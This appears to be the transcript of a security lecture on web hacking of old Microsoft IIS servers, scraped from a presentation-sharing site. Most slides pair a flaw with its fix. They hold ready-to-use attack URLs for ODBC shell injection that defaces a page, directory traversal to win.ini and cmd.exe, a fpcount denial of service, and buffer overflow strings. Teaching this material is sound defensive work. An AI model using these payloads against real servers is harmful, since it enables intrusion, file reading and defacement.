1 / 18

Web Hacking

Web Hacking. Brute Force Password Guessing Vulnerabilities IIS …. Brute Force Password Guessing. Tools Brutus, http://www.hoobie.net/brutus/brutus-download.html “Dictionary file”. IIS Vulnerability. Catalog_type.asp NT ODBC Remote Compromise

joy
Télécharger la présentation

Web Hacking

An Image/Link below is provided (as is) to download presentation Download Policy: Content on the Website is provided to you AS IS for your information and personal use and may not be sold / licensed / shared on other websites without getting consent from its author. Content is provided to you AS IS for your information and personal use only. Download presentation by click this link. While downloading, if for some reason you are not able to download a presentation, the publisher may have deleted the file from their server. During download, if you can't get a presentation, the file might be deleted by the publisher.

E N D

Presentation Transcript

  1. Web Hacking • Brute Force Password Guessing • Vulnerabilities • IIS • …..

  2. Brute Force Password Guessing • Tools • Brutus, http://www.hoobie.net/brutus/brutus-download.html • “Dictionary file”

  3. IIS Vulnerability • Catalog_type.asp • NT ODBC Remote Compromise • Vulnerability of “JET data base engine” (for Windows NT) • SQL query +|shell(”instruction”) • |http://ipaddress/AdvWorks/equipment/catalog_type.asp?ProductType=|shell(“cmd+/c+echo Hacked By Somebody >c:\..default.html”)| • Code.asp • A problem with String Matching • /ADvWorks, /ASPSamp • http://ipaddress/AdvWorks/code.asp?source=/AdvWorks/../../../winnt/win.ini • Countermeasure • Remove these ASP

  4. IIS vulnerability: FPcount • DoS attack • http://ip address/_vti_bin/fpcount.exe?Page=default.htm|image=1Digits=20000 • Reserve 476K per request.. • Countermeasure • Remove fpcount.exe

  5. IIS vulnerability: ISS Unicode • %C1%9c  Unicode “\” • http://ipaddress/scripts/..%c1%9c..\winnt\system32\cmd.exe?/c+dir • /scripts : IIS’s default setting of this folder is executable • Consequence: do everything they want, include

  6. Countermeasure of Web Hacking • Do not use IIS (refer to appendix A) • Patch your Web Server • Remove unnecessary services • IIS examples • Fpcount • ….. (check IIS vulnerability list)

  7. They had been hacked

  8. Services: Port scan

  9. What N-map got

  10. Found “Unicode vulnerability”

  11. Evade IIS’s check

  12. Bingo:change again

  13. Hey! Web page back

  14. Loss again

  15. Msadcs.dll (same with Catalog_type.asp ) Countermeasure Patch document: number, MS99-025 Remove it, if you don’t need it Patch it, if you need it Version of MDAC (check Msdadc.dll, Oledb32.dll) MDAC 1.5 Upgrade to 2.1 handlerRequired(Set DWOD value to 1) MDAC 2.0 handlerRequired(Set DWOD value to 1) Delete RDS examples IIS vulnerability: MDAC/RDS

  16. IIS vulnerability: FrontPage98 dvwssr.dll • Source code of ASP • Assumption: right to modify homepage • Encryption : (key: Netscape engineers are weenies) • Tool: dvwssr.exe (Perl code, wrote by “Rain Forest Puppy”) • Buffer overflow • http://ip address/GET/_vti_aut/dvssr.dll?aaaaa…(5,000 “a” or whatever) • Countermeasure: remove dvwssr.dll directly, or install window 2000, office 2000 extension, frontpage 2000 server extensions(remove dvwssr.dll automatically)

  17. IIS vulnerability: Malformed HTR Request (MS99-019) • ISM.DLL (Buffer overflow) • .htr • http://ip address/aaaa…aaaaaaaaaaaaaa.htr (abount 3,000 a)

More Related